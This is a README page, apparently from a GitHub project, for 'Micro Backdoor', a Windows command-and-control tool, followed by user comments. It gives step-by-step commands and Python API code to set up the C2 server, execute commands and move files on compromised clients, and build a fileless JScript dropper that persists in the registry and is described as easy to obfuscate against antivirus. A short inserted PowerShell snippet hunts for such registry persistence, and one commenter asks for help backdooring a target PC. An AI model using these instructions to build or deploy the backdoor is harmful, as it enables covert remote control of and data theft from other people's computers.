Small and convenient C2 tool for Windows targets

Micro Backdoor for Windows

Micro Backdoor is a C2 tool for Windows targets with an easily customizable code base and a small footprint. It consists of a server, a client and a dropper. It wasn't designed as a replacement for your favorite post-exploitation tools but rather as a really minimalistic thing with all of the basic features in less than 5000 lines of code; the client DLL is less than 20 KB without compression.

I'm using Micro Backdoor mostly for demonstration purposes, as a payload for my firmware rootkits and various low-level persistence techniques. Its code was written in a couple of nights, so it might contain bugs and vulnerabilities: use it at your own risk.

General information
Web interface screenshots
Configuring the server
Using Python API
Deploying the server
Building Docker container
Configuring the client

General information

Micro Backdoor client supports 32-bit and 64-bit versions of Windows XP, Vista, 7, 8, 8.1, 10, Server 2003, Server 2003 R2, Server 2008, Server 2008 R2, Server 2012, Server 2012 R2, Server 2016 and Server 2019, in any edition, language and service pack.

Key features of the Micro Backdoor:

  • The client dropper is written in Microsoft JScript, which makes it extremely convenient for obfuscation: once AV starts to detect the dropper you can easily modify its code or apply existing JScript obfuscation tools.

  • The client can detect a SOCKS 4, SOCKS 5 or HTTP proxy server configured in the system settings and connect to the server over this proxy.

  • To communicate with the server, the Micro Backdoor client uses an end-to-end encrypted protocol with RSA authentication and a random session key.

  • The client dropper does not create any executable files on disk: its body is stored inside Windows registry values, which reduces the backdoor's footprint and makes it stealthier.

  • The backdoor server is written in Python and can be used on any operating system. It provides a clean and simple web interface that allows you to interact with connected clients in a convenient way. A Redis database is used to store client state.

  • The backdoor server keeps track of all client and server events in log files.

  • For each connected client Micro Backdoor provides a semi-interactive command shell running in the web browser.

  • Micro Backdoor has a convenient file manager that allows you to browse the client file system and download and upload files.

  • Full Unicode and native language support in both client and server.

  • The backdoor server also provides a Python API and a command line interface to perform any actions with connected clients, which is useful for automation and scripting.

Web interface screenshots

Main web interface page with connected clients list:

Command shell page:

File manager page:

Configuring the server

Micro Backdoor server code is located in the ./server directory; you have to upload its contents to the remote machine where you are planning to run the server.

Directory contents:

  • server.py − Server executable file
  • config.py − Server configuration file
  • access.log − Access log of embedded web server used for admin interface
  • server.log − Server log file with messages related to connected clients
  • server.crt − Server RSA certificate used to encrypt client communication
  • server.key − Server RSA private key, see above
  • downloads/ − Directory to store files downloaded from the clients
  • logs/ − Directory with individual command line history files for each client
  • static/ − Directory with static files needed for admin interface

The Python program server.py has a lot of command line options used to configure and manage the server, interact with connected clients, etc. Here's how to get the server running:

  1. Install the needed dependencies:

$ sudo apt-get install build-essential swig libssl-dev python python-dev python-setuptools python-pip
$ sudo pip install m2crypto pycrypto redis cherrypy defusedxml

  2. Install and run the Redis database server:

$ sudo apt-get install redis-server
$ sudo service redis-server start

  3. Edit the config.py file and change the default values of HTTP_USERS and HTTP_PATH to secure your server installation.

  4. Generate an RSA key pair for the new installation of the server; this creates the server.crt and server.key files:

$ ./server.py --keys

  5. Run the server as a background process:

$ ./server.py --daemon

  6. Shut down the server:

$ ./server.py --shutdown

Alternatively, you can run server.py with no command line options to start the server as an interactive shell process (useful for debugging). After the server has started you can open the admin interface in a web browser; its URL is composed from the HTTP_ADDR, HTTP_PORT and HTTP_PATH options of the config.py configuration file.

There are also some options to interact with connected clients from the command line.

Retrieve and print the list of currently connected clients:

$ ./server.py --list

Execute a command on a connected client:

$ ./server.py --client <client_ID> --exec <command>

Upload a file to a connected client:

$ ./server.py --client <client_ID> --fput <remote_path> --file <local_path>

Download a file from a connected client:

$ ./server.py --client <client_ID> --fget <remote_path> --file <local_path>

Update Micro Backdoor on a client:

$ ./server.py --client <client_ID> --update <dropper_path>

Using Python API

As mentioned above, the Micro Backdoor server also provides a Python API to interact with connected clients, which is quite useful for automation and scripting purposes. Here are some examples of how to use this API.

Obtain and print connected clients list:

from server import ClientHelper

# get clients list
clients = ClientHelper().client_list()

for client in clients:

    # print client information
    print('ID = %s, addr = %s' % (client.client_id, client.addr[0]))

Execute console command on the client:

import sys
from server import ClientHelper

# client_id is the ID of a connected client, as printed by client_list() or --list
client_id = '<client_ID>'

# create client helper instance
client = ClientHelper(client_id)

# connect to the corresponding child process of the server
client.mapper_connect()

# execute console command, get its output and exit code
output, exit_code = client.execute('whoami')

# execute console command and redirect its output into the stream
client.execute('whoami', stream = sys.stdout)

Work with the file system of the client:

from server import ClientHelper

# client_id is the ID of a connected client, as printed by client_list() or --list
client_id = '<client_ID>'

# create client helper instance
client = ClientHelper(client_id)

# connect to the corresponding child process of the server
client.mapper_connect()

# download file from the client (remote path, local path)
client.file_get('C:\\Windows\\win.ini', 'win.ini')

# upload file to the client (remote path, local path)
client.file_put('C:\\Users\\Test\\example.txt', 'example.txt')

# enumerate files in some directory; size is None for subdirectories
for size, name in client.file_list('C:\\Windows'):

    if size is None:

        # print directory name
        print(' DIR: %s' % name)

    else:

        # print file name and size
        print('FILE: %s [%d bytes]' % (name, size))

Execute WMI queries on the client:

from server import ClientHelper

# client_id is the ID of a connected client, as printed by client_list() or --list
client_id = '<client_ID>'

# create client helper instance
client = ClientHelper(client_id)

# connect to the corresponding child process of the server
client.mapper_connect()

# get CIM_OperatingSystem WMI class as a dictionary of members
for name, value in client.execute_wmi('os').items():

    # print class member name and value
    print('%s = %s' % (name, value))

# get only the "Caption" class member value
os_name = client.execute_wmi('os', props = 'Caption')

Deploying the server

For easy deployment of the Micro Backdoor server there's a Fabric scenario located in the fabfile.py Python script. To deploy the server to a remote Linux host, perform the following steps.

  1. Edit the .ssh_config file located in the project directory and add your server information there, for example:

Host my-server
     HostName my-server.net
     Port 22
     User user
     IdentityFile ~/.ssh/id_rsa

  2. Run ./server.py --keys on your local machine to generate an RSA key pair for secure communication between the Micro Backdoor client and server.

  3. Run the fab deps:host=my-server command to connect to the remote host my-server over SSH and install the needed dependencies.

  4. Run the fab deploy:host=my-server command to copy the needed files to the remote host my-server and run the server.

  5. You can also run fab stop to stop the running server, fab start to start it and fab uninstall to shut it down and remove its files from the remote host.

Building Docker container

You can also run the Micro Backdoor server inside a Docker container with SSH and Redis servers included. To install Docker on Ubuntu just run sudo apt-get install docker.io; for other distributions and operating systems please refer to the official documentation.

Before building the container you need to run ./server.py --keys on your local machine to generate an RSA key pair for secure communication between the Micro Backdoor client and server. Then cd into the docker directory and run make to build the Docker image and start the container. To stop the running container you can press Ctrl+C; use the make start/make stop commands to run it in the background, make rm to remove the container and make rmi to remove the image. To ssh into the running container run make shell and enter the password specified in the docker/makefile.conf file ("acab" without quotes by default).

NOTE: Before building the Docker container please ensure that the exposed TCP ports specified in docker/makefile.conf are the same as the CLIENT_PORT and HTTP_PORT port numbers specified in the server's config.py.

Configuring the client

Micro Backdoor client consists of a binary part that implements the backdoor functionality and a JScript wrapper combined with shellcode that runs and delivers the binary part in a file-less way.

⚠️ The JScript and PowerShell code used in the client dropper is easily detectable by most AV/EDR products; you should consider modifying it or using other methods to deliver the binary part of the client.

First, you have to configure the binary using the ./client_builder.py command line program; it operates with the default configuration specified in the ./server/config.py file mentioned in the previous part of this document.

Install the Python pefile library:

$ pip install pefile

Configure the client binary:

$ ./client_builder.py client.dll [server_IP]

You can also specify the client_amd64.dll file to use the x86_64 version of the client, or client_debug.dll/client_amd64_debug.dll to use a debug build of the client that prints diagnostic messages to the standard Windows debug output. Before running client_builder.py you need to generate an RSA key pair; see the Configuring the server section of this document.

You can use the configured client binary with your own delivery tool (exploit, reflective loader, etc.), or you can generate the JScript client dropper:

$ ./client_encoder.py dll_inject_script client.dll > dropper.js

Please note that the JScript/PowerShell reflective loader generated by client_encoder.py works only with 32-bit versions of the client binary, on both 32-bit and 64-bit Windows targets. 64-bit client binaries are provided only for convenience, in case you need to use them with your own loaders and tools.

After dropper.js has been generated you can deploy it on your targets. In the Windows command line you can run JScript files with cscript.exe dropper.js, or you can just double-click the JS file in Windows Explorer to run the dropper. Micro Backdoor client provides persistence within the current user account used to run the dropper; it can work with any privileges and at medium integrity level.
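As an added defender-side check (not part of Micro Backdoor or its documentation), the PowerShell snippet below lists per-user autostart registry values that launch a script host with a .js argument or that are unusually long, which is what a JScript dropper stored in registry values and persisting in the current user account would look like. The page does not name the registry key the client uses, so the HKCU Run/RunOnce locations and the 512-character threshold are assumptions of this example.

```powershell
# Added defender-side hunt; not part of Micro Backdoor.
# Assumption: per-user persistence lands in the standard HKCU autostart keys
# (the README does not state which key the client actually uses).
$autostartKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Script hosts the README's dropper relies on (cscript.exe/wscript.exe) plus
# PowerShell, which the README says the reflective loader also uses.
$hostPattern = '(?i)\b(cscript|wscript|powershell|pwsh)(\.exe)?\b'
# Provider metadata added by Get-ItemProperty; these are not registry values.
$metaProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

foreach ($key in $autostartKeys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-ItemProperty -Path $key
    foreach ($prop in $item.PSObject.Properties) {
        if ($prop.Name -in $metaProps) { continue }
        $value = [string]$prop.Value
        $flags = @()
        if ($value -match $hostPattern) { $flags += 'script-host' }
        if ($value -match '(?i)\.js\b') { $flags += 'js-argument' }
        # Assumed threshold: a value carrying an inline payload is far longer
        # than a normal "path to executable" autostart entry.
        if ($value.Length -gt 512) { $flags += 'long-value' }
        if ($flags.Count -gt 0) {
            [pscustomobject]@{
                Key   = $key
                Name  = $prop.Name
                Flags = ($flags -join ',')
                Value = if ($value.Length -gt 120) { $value.Substring(0, 120) + '...' } else { $value }
            }
        }
    }
}
```

Run it in the context of the user account being examined, since HKCU resolves to the current user's hive; a flagged entry is a lead to review, not a verdict.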

Developed by

Dmytro Oleksiuk (aka Cr4sh)

[email protected]
http://blog.cr4.sh
@d_olex

Comments
  • AttributeError: 'module' object has no attribute 'SERVER_ADDR'

    hello everyone, I found a problem in the file client_builder.py; it says in the Conf module there is no SERVER_ADDR attribute. But checking in the config.py file there is the variable SERVER_ADDR. I tried to search the internet for the solution but I didn't find anything, I hope you could tell me the solution to this problem.

    ERROR: python2 client_builder.py client.dll 127.0.0.1
    Traceback (most recent call last):
      File "client_builder.py", line 108, in <module>
        exit(main())
      File "client_builder.py", line 85, in main
        addr = Conf.SERVER_ADDR
    AttributeError: 'module' object has no attribute 'SERVER_ADDR'

  • What part of the config.py file needs to be modified?

    Say the address of the server is 123.45.67.89, what parts of the config.py need to list that IP address? I'm running the client builder and it's creating my client.dll, but when I go to run the dll on the PC I want a backdoor on, nothing is connecting. I'm not sure what I need to modify in order to get this to work. What is the Server Process IPC for, and the Child Server Process IPC, or the Redis DB host/port?
